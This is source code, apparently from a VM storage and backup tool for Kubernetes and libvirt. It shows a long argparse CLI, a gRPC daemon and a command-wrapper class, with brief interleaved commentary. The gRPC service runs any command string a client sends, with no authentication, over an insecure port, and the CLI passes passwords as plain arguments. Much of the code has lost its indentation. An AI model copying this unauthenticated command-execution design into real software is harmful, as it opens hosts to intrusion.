parser_create_disk_from_image.add_argument("--full_copy", metavar="[full_copy]", type=bool, nargs='?', const=True,
help="if full_copy, new disk will be created by snapshot")
# set default func
parser_create_disk_from_image.set_defaults(func=createDiskFromImageParser)
# -------------------- add migrate cmd ----------------------------------
parser_migrate = subparsers.add_parser("migrate", help="migrate help")
parser_migrate.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to migrate")
parser_migrate.add_argument("--ip", required=True, metavar="[IP]", type=str,
help="storage pool type to use")
parser_migrate.add_argument("--offline", metavar="[OFFLINE]", type=bool, nargs='?', const=True,
help="support migrate offline")
# set default func
parser_migrate.set_defaults(func=migrateParser)
# -------------------- add migrateDisk cmd ----------------------------------
parser_migrate_disk = subparsers.add_parser("migrateDisk", help="migrate disk help")
parser_migrate_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vol to migrate")
parser_migrate_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="target storage pool to use")
# set default func
parser_migrate_disk.set_defaults(func=migrateDiskParser)
# -------------------- add migrateVMDisk cmd ----------------------------------
parser_migrate_vm_disk = subparsers.add_parser("migrateVMDisk", help="migrateVMDisk help")
parser_migrate_vm_disk.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to migrate")
parser_migrate_vm_disk.add_argument("--ip", required=True, metavar="[IP]", type=str,
help="storage pool type to use")
parser_migrate_vm_disk.add_argument("--migratedisks", required=True, metavar="[MIGRATEDISKS]", type=str,
help="vol opt to migrate")
# parser_migrate_vm_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
# help="target storage pool to use")
# set default func
parser_migrate_vm_disk.set_defaults(func=migrateVMDiskParser)
# -------------------- add restoreDisk cmd ----------------------------------
parser_change_disk_pool = subparsers.add_parser("changeDiskPool", help="changeDiskPool help")
parser_change_disk_pool.add_argument("--xml", required=True, metavar="[XML]", type=str,
                                     help="vm disk xml to use")
# set default func
parser_change_disk_pool.set_defaults(func=changeDiskPoolParser)
# -------------------- add modifyVM cmd ----------------------------------
parser_modify_vm = subparsers.add_parser("modifyVM", help="modifyVM help")
parser_modify_vm.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to migrate")
# parser_migrate_vm_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
# help="target storage pool to use")
# set default func
parser_modify_vm.set_defaults(func=modifyVMParser)
# -------------------- add exportVM cmd ----------------------------------
parser_export_vm = subparsers.add_parser("exportVM", help="exportVM help")
parser_export_vm.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_export_vm.add_argument("--path", required=True, metavar="[PATH]", type=str,
help="vm disk file to export")
# set default func
parser_export_vm.set_defaults(func=exportVMParser)
# -------------------- add backupVM cmd ----------------------------------
parser_backup_vm = subparsers.add_parser("backupVM", help="backupVM help")
parser_backup_vm.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_backup_vm.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_backup_vm.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_backup_vm.add_argument("--all", required=False, metavar="[ALL]", type=bool, nargs='?', const=True,
help="all vm disk")
parser_backup_vm.add_argument("--full", required=False, metavar="[FULL]", type=bool, nargs='?', const=True,
help="full backup")
parser_backup_vm.add_argument("--remote", required=False, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_backup_vm.add_argument("--port", required=False, metavar="[PORT]", type=str,
help="remote server port.")
parser_backup_vm.add_argument("--username", required=False, metavar="[REMOTE]", type=str,
help="remote server username.")
parser_backup_vm.add_argument("--password", required=False, metavar="[REMOTE]", type=str,
help="remote server password.")
# set default func
parser_backup_vm.set_defaults(func=backupVMParser)
# -------------------- add restoreVM cmd ----------------------------------
parser_restore_vm = subparsers.add_parser("restoreVM", help="restoreVM help")
parser_restore_vm.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_restore_vm.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_restore_vm.add_argument("--all", required=False, metavar="[ALL]", type=bool, nargs='?', const=True,
help="all vm disk")
parser_restore_vm.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_restore_vm.add_argument("--newname", required=False, metavar="[NEWNAME]", type=str,
help="name when create a new domain")
parser_restore_vm.add_argument("--target", required=False, metavar="[TARGET]", type=str,
help="use target pool to create a new domain")
# set default func
parser_restore_vm.set_defaults(func=restoreVMParser)
# -------------------- add backupDisk cmd ----------------------------------
parser_backup_disk = subparsers.add_parser("backupDisk", help="backupDisk help")
parser_backup_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_backup_disk.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_backup_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_backup_disk.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_backup_disk.add_argument("--full", required=False, metavar="[FULL]", type=bool, nargs='?', const=True,
help="full backup")
parser_backup_disk.add_argument("--remote", required=False, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_backup_disk.add_argument("--port", required=False, metavar="[PORT]", type=str,
help="remote server port.")
parser_backup_disk.add_argument("--username", required=False, metavar="[REMOTE]", type=str,
help="remote server username.")
parser_backup_disk.add_argument("--password", required=False, metavar="[REMOTE]", type=str,
help="remote server password.")
# set default func
parser_backup_disk.set_defaults(func=backupDiskParser)
# -------------------- add restoreDisk cmd ----------------------------------
parser_restore_disk = subparsers.add_parser("restoreDisk", help="restoreDisk help")
parser_restore_disk.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_restore_disk.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_restore_disk.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_restore_disk.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_restore_disk.add_argument("--newname", required=False, metavar="[NEWNAME]", type=str,
help="name when create a new domain")
parser_restore_disk.add_argument("--target", required=False, metavar="[TARGET]", type=str,
help="use target pool to create a new domain")
parser_restore_disk.add_argument("--targetDomain", required=False, metavar="[TARGETDOMAIN]", type=str,
help="target domain to attach disk")
# set default func
parser_restore_disk.set_defaults(func=restoreDiskParser)
# -------------------- add showDiskPool cmd ----------------------------------
parser_show_disk_pool = subparsers.add_parser("showDiskPool", help="showDiskPool help")
parser_show_disk_pool.add_argument("--path", required=True, metavar="[PATH]", type=str,
help="vm disk path")
# set default func
parser_show_disk_pool.set_defaults(func=showDiskPoolParser)
# -------------------- add deleteVMBackup cmd ----------------------------------
parser_delete_vm_backup = subparsers.add_parser("deleteVMBackup", help="deleteVMBackup help")
parser_delete_vm_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_delete_vm_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_delete_vm_backup.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
# set default func
parser_delete_vm_backup.set_defaults(func=deleteVMBackupParser)
# -------------------- add deleteVMDiskBackup cmd ----------------------------------
parser_delete_vm_disk_backup = subparsers.add_parser("deleteVMDiskBackup", help="deleteVMDiskBackup help")
parser_delete_vm_disk_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_delete_vm_disk_backup.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_delete_vm_disk_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="vm domain backup pool, must shared type, like nfs")
parser_delete_vm_disk_backup.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
# set default func
parser_delete_vm_disk_backup.set_defaults(func=deleteVMDiskBackupParser)
# -------------------- add deleteRemoteBackup cmd ----------------------------------
parser_delete_remote_backup = subparsers.add_parser("deleteRemoteBackup", help="deleteRemoteBackup help")
parser_delete_remote_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_delete_remote_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_delete_remote_backup.add_argument("--pool", required=False, metavar="[POOL]", type=str,
help="vm pool to backup")
parser_delete_remote_backup.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_delete_remote_backup.add_argument("--remote", required=True, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_delete_remote_backup.add_argument("--port", required=True, metavar="[PORT]", type=str,
help="remote server port.")
parser_delete_remote_backup.add_argument("--username", required=True, metavar="[USERNAME]", type=str,
help="remote server username.")
parser_delete_remote_backup.add_argument("--password", required=True, metavar="[PASSWORD]", type=str,
help="remote server password.")
# set default func
parser_delete_remote_backup.set_defaults(func=deleteRemoteBackupParser)
# -------------------- add pullRemoteBackup cmd ----------------------------------
parser_pull_remote_backup = subparsers.add_parser("pullRemoteBackup", help="pullRemoteBackup help")
parser_pull_remote_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_pull_remote_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_pull_remote_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_pull_remote_backup.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_pull_remote_backup.add_argument("--remote", required=True, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_pull_remote_backup.add_argument("--port", required=True, metavar="[PORT]", type=str,
help="remote server port.")
parser_pull_remote_backup.add_argument("--username", required=True, metavar="[USERNAME]", type=str,
help="remote server username.")
parser_pull_remote_backup.add_argument("--password", required=True, metavar="[PASSWORD]", type=str,
help="remote server password.")
# set default func
parser_pull_remote_backup.set_defaults(func=pullRemoteBackupParser)
# -------------------- add pushBackup cmd ----------------------------------
parser_push_backup = subparsers.add_parser("pushBackup", help="pushBackup help")
parser_push_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_push_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_push_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_push_backup.add_argument("--version", required=True, metavar="[VERSION]", type=str,
help="backup version id")
parser_push_backup.add_argument("--remote", required=True, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_push_backup.add_argument("--port", required=True, metavar="[PORT]", type=str,
help="remote server port.")
parser_push_backup.add_argument("--username", required=True, metavar="[USERNAME]", type=str,
help="remote server username.")
parser_push_backup.add_argument("--password", required=True, metavar="[PASSWORD]", type=str,
help="remote server password.")
# set default func
parser_push_backup.set_defaults(func=pushBackupParser)
# -------------------- add createCloudInitUserDataImage cmd ----------------------------------
parser_create_cloud_init = subparsers.add_parser("createCloudInitUserDataImage",
help="createCloudInitUserDataImage help")
parser_create_cloud_init.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_create_cloud_init.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vol")
parser_create_cloud_init.add_argument("--userData", required=False, metavar="[USERDATA]", type=str,
help="userData")
# set default func
parser_create_cloud_init.set_defaults(func=createCloudInitUserDataImageParser)
# -------------------- add deleteCloudInitUserDataImage cmd ----------------------------------
parser_delete_cloud_init = subparsers.add_parser("deleteCloudInitUserDataImage",
help="deleteCloudInitUserDataImage help")
parser_delete_cloud_init.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_delete_cloud_init.add_argument("--vol", required=True, metavar="[VOL]", type=str,
help="vol")
# set default func
parser_delete_cloud_init.set_defaults(func=deleteCloudInitUserDataImageParser)
# -------------------- add updateOS cmd ----------------------------------
parser_update_os = subparsers.add_parser("updateOS", help="updateOS help")
parser_update_os.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
                              help="vm domain to update")
parser_update_os.add_argument("--source", required=True, metavar="[SOURCE]", type=str,
                              help="source os disk to use")
parser_update_os.add_argument("--target", required=True, metavar="[TARGET]", type=str,
                              help="target os disk to use")
# set default func
parser_update_os.set_defaults(func=updateOSParser)
# -------------------- add cleanBackup cmd ----------------------------------
parser_clean_backup = subparsers.add_parser("cleanBackup", help="cleanBackup help")
parser_clean_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_clean_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_clean_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
parser_clean_backup.add_argument("--version", required=False, metavar="[VERSION]", type=str,
help="backup version id")
parser_clean_backup.add_argument("--all", required=False, metavar="[ALL]", type=bool, nargs='?', const=True,
help="full clean")
# set default func
parser_clean_backup.set_defaults(func=cleanBackupParser)
# -------------------- add cleanRemoteBackup cmd ----------------------------------
parser_clean_remote_backup = subparsers.add_parser("cleanRemoteBackup", help="cleanRemoteBackup help")
parser_clean_remote_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_clean_remote_backup.add_argument("--pool", required=False, metavar="[POOL]", type=str,
help="vm pool to backup")
parser_clean_remote_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_clean_remote_backup.add_argument("--version", required=False, metavar="[VERSION]", type=str,
help="backup version id")
parser_clean_remote_backup.add_argument("--all", required=False, metavar="[ALL]", type=bool, nargs='?', const=True,
help="full clean")
parser_clean_remote_backup.add_argument("--remote", required=True, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_clean_remote_backup.add_argument("--port", required=True, metavar="[PORT]", type=str,
help="remote server port.")
parser_clean_remote_backup.add_argument("--username", required=True, metavar="[USERNAME]", type=str,
help="remote server username.")
parser_clean_remote_backup.add_argument("--password", required=True, metavar="[PASSWORD]", type=str,
help="remote server password.")
# set default func
parser_clean_remote_backup.set_defaults(func=cleanRemoteBackupParser)
# -------------------- add scanBackup cmd ----------------------------------
parser_scan_backup = subparsers.add_parser("scanBackup", help="scanBackup help")
parser_scan_backup.add_argument("--domain", required=True, metavar="[DOMAIN]", type=str,
help="vm domain to export")
parser_scan_backup.add_argument("--vol", required=False, metavar="[VOL]", type=str,
help="vm disk to backup")
parser_scan_backup.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="backup to store")
# set default func
parser_scan_backup.set_defaults(func=scanBackupParser)
# -------------------- add deleteRemoteBackupServer cmd ----------------------------------
parser_delete_remote_backup_server = subparsers.add_parser("deleteRemoteBackupServer",
help="deleteRemoteBackupServer help")
parser_delete_remote_backup_server.add_argument("--remote", required=True, metavar="[REMOTE]", type=str,
help="remote server host.")
parser_delete_remote_backup_server.add_argument("--port", required=True, metavar="[PORT]", type=str,
help="remote server port.")
parser_delete_remote_backup_server.add_argument("--username", required=True, metavar="[USERNAME]", type=str,
help="remote server username.")
parser_delete_remote_backup_server.add_argument("--password", required=True, metavar="[PASSWORD]", type=str,
help="remote server password.")
parser_delete_remote_backup_server.add_argument("--pool", required=True, metavar="[POOL]", type=str,
help="storage pool to use")
# set default func
parser_delete_remote_backup_server.set_defaults(func=deleteRemoteBackupServerParser)
# https://stackoverflow.com/questions/48648036/python-argparse-args-has-no-attribute-func
try:
os.putenv('LANG', 'en_US.UTF-8')
args = parser.parse_args()
args.func(args)
except TypeError:
# print"argument number not enough"
logger.debug(traceback.format_exc())
```
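kubesds-adm.py leans on `error_print` and `success_print` (pulled in through `from operation import *`), whose definitions are not shown in this record. Since kubesds-rpc-service.py (below) parses the tool's stdout as a JSON envelope via `runCmdWithResult`, they presumably print that envelope and stop. The sketch below is an assumption about their shape, including the exit codes, not the repo's actual implementation.
```python
# Hedged sketch of error_print/success_print as kubesds-adm.py appears to use them.
# The envelope mirrors the {'result': {'code', 'msg'}, 'data'} responses built in
# kubesds-rpc-service.py; the function bodies and exit codes are assumptions.
import json
import sys


def error_print(code, msg, data=None):
    # emit a JSON error envelope on stdout and abort the current sub-command
    print(json.dumps({"result": {"code": code, "msg": msg}, "data": data or {}}))
    sys.exit(1)


def success_print(msg, data):
    # emit a JSON success envelope (code 0) on stdout and stop further processing
    print(json.dumps({"result": {"code": 0, "msg": msg}, "data": data}))
    sys.exit(0)
```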
#### File: 742362144/kubeext-SDS-python3/kubesds-rpc-service.py
```python
import os
import socket
import subprocess
import sys
import threading
import time
import traceback
from threading import Thread
import grpc
from json import dumps
from concurrent import futures
from netutils import get_host_ip, get_docker0_IP
from utils.exception import ExecuteException
from utils.k8s import get_hostname_in_lower_case
sys.path.append('%s/' % os.path.dirname(os.path.realpath(__file__)))
from utils import logger
from utils.utils import CDaemon, singleton, runCmdWithResult, runCmdAndGetOutput, runCmd, runCmdAndTransferXmlToJson, \
runCmdAndSplitKvToJson, get_pools_by_node, get_pool_info_from_k8s, pool_active, auto_mount
import cmdcall_pb2, cmdcall_pb2_grpc  # the two modules generated from cmdcall.proto by protoc
LOG = "/var/log/kubesds-rpc3.log"
logger = logger.set_logger(os.path.basename(__file__), LOG)
DEFAULT_PORT = '19999'
class Operation(object):
def __init__(self, cmd, params, with_result=False, xml_to_json=False, kv_to_json=False, output=False):
        if cmd is None or cmd == "":
            raise Exception("please provide a valid cmd.")
        if not isinstance(params, dict):
            raise Exception("please provide parameters as a dict.")
        self.params = params
        self.cmd = cmd
self.with_result = with_result
self.xml_to_json = xml_to_json
self.kv_to_json = kv_to_json
self.output = output
def get_cmd(self):
cmd = self.cmd
for key in list(self.params.keys()):
cmd = "%s --%s %s " % (cmd, key, self.params[key])
return cmd
def execute(self):
cmd = self.get_cmd()
logger.debug(cmd)
if self.with_result:
return runCmdWithResult(cmd)
elif self.xml_to_json:
return runCmdAndTransferXmlToJson(cmd)
elif self.kv_to_json:
return runCmdAndSplitKvToJson(cmd)
elif self.output:
return runCmdAndGetOutput(cmd)
else:
return runCmd(cmd)
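# Example (illustrative, not part of the original source):
#   Operation("kubesds-adm showPool", {"type": "localfs", "pool": "pool1"}).get_cmd()
# returns the command string
#   "kubesds-adm showPool --type localfs --pool pool1 "
# which execute() then hands to one of the runCmd* helpers, chosen by the
# with_result / xml_to_json / kv_to_json / output flags.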
class CmdCallServicer(cmdcall_pb2_grpc.CmdCallServicer):
def Call(self, request, ctx):
try:
cmd = str(request.cmd)
logger.debug(cmd)
op = Operation(cmd, {})
op.execute()
logger.debug(request)
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 0, 'msg': 'rpc call kubesds-adm cmd %s successful.' % cmd}, 'data': {}}))
except ExecuteException as e:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 1, 'msg': 'rpc call kubesds-adm cmd failure %s' % e.message}, 'data': {}}))
except Exception:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 1, 'msg': 'rpc call kubesds-adm cmd failure %s' % traceback.format_exc()}, 'data': {}}))
def CallWithResult(self, request, context):
try:
cmd = str(request.cmd)
logger.debug(cmd)
op = Operation(cmd, {}, with_result=True)
result = op.execute()
logger.debug(request)
logger.debug(result)
if result['result']['code'] == 0:
return cmdcall_pb2.CallResponse(json=dumps(result))
else:
result['result']['msg'] = 'rpc call kubesds-adm cmd failure %s' % result['result']['msg']
return cmdcall_pb2.CallResponse(json=dumps(result))
except ExecuteException as e:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 1, 'msg': 'rpc call kubesds-adm cmd failure %s' % e.message}, 'data': {}}))
except Exception:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 1, 'msg': 'rpc call kubesds-adm cmd failure %s' % traceback.format_exc()}, 'data': {}}))
def CallAndTransferXmlToJson(self, request, context):
try:
cmd = str(request.cmd)
logger.debug(cmd)
op = Operation(cmd, {}, xml_to_json=True)
result = op.execute()
logger.debug(request)
logger.debug(result)
return cmdcall_pb2.CallResponse(json=dumps(result))
except ExecuteException as e:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % e.message}, 'data': {}}))
except Exception:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % traceback.format_exc()}, 'data': {}}))
def CallAndSplitKVToJson(self, request, context):
try:
cmd = str(request.cmd)
logger.debug(cmd)
op = Operation(cmd, {}, kv_to_json=True)
result = op.execute()
logger.debug(request)
logger.debug(result)
return cmdcall_pb2.CallResponse(json=dumps(result))
except ExecuteException as e:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % e.message}, 'data': {}}))
except Exception:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % traceback.format_exc()}, 'data': {}}))
def CallAndGetOutput(self, request, context):
try:
cmd = str(request.cmd)
logger.debug(cmd)
op = Operation(cmd, {}, output=True)
result = op.execute()
logger.debug(request)
logger.debug(result)
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 0, 'msg': result}, 'data': {}}))
except ExecuteException as e:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(
json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % e.message}, 'data': {}}))
except Exception:
logger.debug(traceback.format_exc())
return cmdcall_pb2.CallResponse(json=dumps({'result': {'code': 1, 'msg': 'call cmd failure %s' % traceback.format_exc()}, 'data': {}}))
def run_server():
# cp k8s config file
if os.path.exists('/root/.kube/config') and not os.path.exists('/etc/kubernetes/admin.conf'):
try:
runCmd('cp -f /root/.kube/config /etc/kubernetes/admin.conf')
except:
pass
# multi-threaded gRPC server
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
# instantiate the servicer that implements the CmdCall service
servicer = CmdCallServicer()
# register the local service; only the CmdCallServicer registration changes per service
cmdcall_pb2_grpc.add_CmdCallServicer_to_server(servicer, server)
# listen on the docker0 address and the default port
logger.debug("%s:%s" % (get_docker0_IP(), DEFAULT_PORT))
server.add_insecure_port("%s:%s" % (get_docker0_IP(), DEFAULT_PORT))
# start accepting and serving requests
server.start()
# auto mount cstor pool
node_name = get_hostname_in_lower_case()
pools = get_pools_by_node(node_name)
for pool in pools:
try:
# // auto_mount
auto_mount(pool['pool'])
except ExecuteException as e:
logger.debug('can not auto mount pool %s' % pool['poolname'])
return server
# press ctrl+c to stop the server
# try:
# print("rpc server running...")
# time.sleep(1000)
# except KeyboardInterrupt:
# print("rpc server stopping...")
# server.stop(0)
def keep_alive():
server = run_server()
server.wait_for_termination()
# while True:
# time.sleep(5)
# while True:
# output = None
# try:
# output = runCmdAndGetOutput('netstat -anp|grep %s:%s' % (get_docker0_IP(), DEFAULT_PORT))
# except ExecuteException:
# logger.debug(traceback.format_exc())
# if output is not None and output.find('%s:%s' % (get_docker0_IP(), DEFAULT_PORT)) >= 0:
# # logger.debug("port 19999 is alive")
# pass
# else:
# # try stop server
# try:
# server.stop(0)
# except Exception:
# logger.debug(traceback.format_exc())
# # restart server
# server = run_server()
# logger.debug("restart port %s..." % DEFAULT_PORT)
# time.sleep(1)
def stop():
output = None
try:
output = runCmdAndGetOutput('ps -ef|grep kubesds-rpc-service')
except ExecuteException:
logger.debug(traceback.format_exc())
if output:
lines = output.splitlines()
if len(lines) <= 1:
return
else:
pid = lines[0].split()[1]
runCmd('kill -9 %s' % pid)
def daemonize():
help_msg = 'Usage: python %s <start|stop|restart|status>' % sys.argv[0]
if len(sys.argv) != 2:
print(help_msg)
sys.exit(1)
pid_fn = '/var/run/kubesds-rpc.pid'
log_fn = '/var/log/kubesds-rpc.log'
err_fn = '/var/log/kubesds-rpc.log'
if sys.argv[1] == 'start':
keep_alive()
elif sys.argv[1] == 'stop':
stop()
elif sys.argv[1] == 'restart':
stop()
keep_alive()
else:
print('invalid argument!')
print(help_msg)
if __name__ == '__main__':
daemonize()
```
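The five RPC methods above are thin wrappers around the `Operation` class defined in `operation.py` below; they differ only in how the command output is parsed before being serialized into `CallResponse.json`. The sketch below is a rough, hypothetical client, not part of the repository: the stub name `CmdCallStub` follows from the `CmdCall` service registered by `add_CmdCallServicer_to_server`, while the request message name `CallRequest` and the `172.17.0.1:19999` address are assumptions standing in for the generated proto message and the docker0 IP / `DEFAULT_PORT` pair the server actually binds.

```python
# Hypothetical client sketch; CallRequest and the target address are assumptions.
import grpc
from json import loads

import cmdcall_pb2
import cmdcall_pb2_grpc


def call_with_result(address, cmd):
    # open an insecure channel to the address the server binds (docker0 IP + DEFAULT_PORT)
    channel = grpc.insecure_channel(address)
    stub = cmdcall_pb2_grpc.CmdCallStub(channel)
    # CallWithResult runs the command with with_result=True on the server and
    # returns its parsed JSON output in the 'json' field of CallResponse
    response = stub.CallWithResult(cmdcall_pb2.CallRequest(cmd=cmd))
    return loads(response.json)


if __name__ == '__main__':
    print(call_with_result('172.17.0.1:19999', 'kubesds-adm showPool --pool pool1'))
```

The other methods (`Call`, `CallAndTransferXmlToJson`, `CallAndSplitKVToJson`, `CallAndGetOutput`) are invoked the same way; only the shape of the returned JSON differs.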
#### File: 742362144/kubeext-SDS-python3/operation.py
```python
from netutils import get_host_IP
from utils.ftp import *
from utils.k8s import get_node_name, get_hostname_in_lower_case
from utils.utils import *
from utils import logger
LOG = "/var/log/kubesds3.log"
logger = logger.set_logger(os.path.basename(__file__), LOG)
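# Operation wraps a shell command plus keyword options rendered as "--key value".
# It runs the command locally or, when remote/ip are given, on another node via
# the remoteRunCmd* helpers; with_result / xml_to_json / kv_to_json select which
# runCmd* helper parses the command's output.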
class Operation(object):
def __init__(self, cmd, params, with_result=False, xml_to_json=False, kv_to_json=False, remote=False, ip=None):
if cmd is None or cmd == "":
raise Exception("plz give me right cmd.")
if not isinstance(params, dict):
raise Exception("plz give me right parameters.")
self.params = params
self.cmd = cmd
self.with_result = with_result
self.xml_to_json = xml_to_json
self.kv_to_json = kv_to_json
self.remote = remote
self.ip = ip
def get_cmd(self):
cmd = self.cmd
for key in list(self.params.keys()):
cmd = "%s --%s %s " % (cmd, key, self.params[key])
return cmd
def execute(self):
cmd = self.get_cmd()
logger.debug(cmd)
if self.remote:
if self.with_result:
logger.debug(self.remote)
logger.debug(self.ip)
return remoteRunCmdWithResult(self.ip, cmd)
else:
logger.debug(self.remote)
logger.debug(self.ip)
return remoteRunCmd(self.ip, cmd)
else:
if self.with_result:
return runCmdWithResult(cmd)
elif self.xml_to_json:
return runCmdAndTransferXmlToJson(cmd)
elif self.kv_to_json:
return runCmdAndSplitKvToJson(cmd)
else:
return runCmd(cmd)
# class Executor(object):
# def __init__(self, ops):
# self.ops = ops
#
# def get_cmd(self):
# cmd = ""
# for k, v in self.params:
# cmd = self.cmd + " " + k + " " + v + " "
# return cmd
#
# def execute(self):
# if self.cmd is None:
# raise Exception("not found cmd to execute")
# cmd = self.get_cmd()
# if self.with_result:
# return runCmdWithResult(cmd)
# else:
# return runCmdAndCheckReturnCode(cmd)
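# createPool: mount the backing storage under DEFARULT_MOUNT_DIR, define and
# (optionally auto)start a libvirt "dir" pool on top of it, persist the pool's
# content type, and register the result as a VirtualMachinePool object in k8s.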
def createPool(params):
# {"result":{"code":0, "msg":"success"}, "data":{"status": "active", "mountpath": "/Disk240", "proto": "localfs", "url": "/dev/sdb1", "poolname": "pool1", "free": 223363817472, "disktype": "file", "maintain": "normal", "used": 768970752, "total": 236152303616}, "obj":"pooladd"}
if params.opt:
kv = {"type": params.type, "poolname": params.uuid, "url": params.url, "opt": params.opt, "uuid": params.pool}
else:
kv = {"type": params.type, "poolname": params.uuid, "url": params.url, "uuid": params.pool}
# mount the backing storage under DEFARULT_MOUNT_DIR
MOUNT_PATH = '%s/%s' % (DEFARULT_MOUNT_DIR, params.uuid)
mount_storage(params.type, params.opt, params.url, MOUNT_PATH)
POOL_PATH = '%s/%s/%s' % (DEFARULT_MOUNT_DIR, params.uuid, params.uuid)
if not os.path.exists(POOL_PATH):
os.makedirs(POOL_PATH)
# step1 define pool
op1 = Operation("virsh pool-define-as", {"name": params.uuid, "type": "dir", "target": POOL_PATH})
op1.execute()
try:
# step2 autostart pool
if params.autostart:
op2 = Operation("virsh pool-autostart", {"pool": params.uuid})
op2.execute()
op3 = Operation("virsh pool-start", {"pool": params.uuid})
op3.execute()
except ExecuteException as e:
op_cancel = Operation("virsh pool-undefine", {"--pool": params.uuid})
op_cancel.execute()
raise e
with open('%s/content' % POOL_PATH, 'w') as f:
f.write(params.content)
# if params.opt:
# url = '%s;%s' % (params.url, params.opt)
# else:
# url = '%s;%s' % (params.url, params.opt)
result = get_pool_info_to_k8s(params.type, params.pool, params.url, params.uuid, params.content)
pool_helper = K8sHelper('VirtualMachinePool')
pool_helper.create(params.pool, 'pool', result)
success_print("create pool %s successful." % params.pool, result)
def deletePool(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
if is_pool_started(poolname):
raise ExecuteException('RunCmdError', 'pool %s still active, plz stop it first.' % poolname)
if is_pool_defined(poolname):
op2 = Operation("virsh pool-undefine", {"pool": poolname})
op2.execute()
umount_storage(params.pool)
helper = K8sHelper("VirtualMachinePool")
helper.delete(params.pool)
success_print("delete pool %s successful." % params.pool, {})
def startPool(params):
pool_info = get_pool_info_from_k8s(params.pool)
poolname = pool_info['poolname']
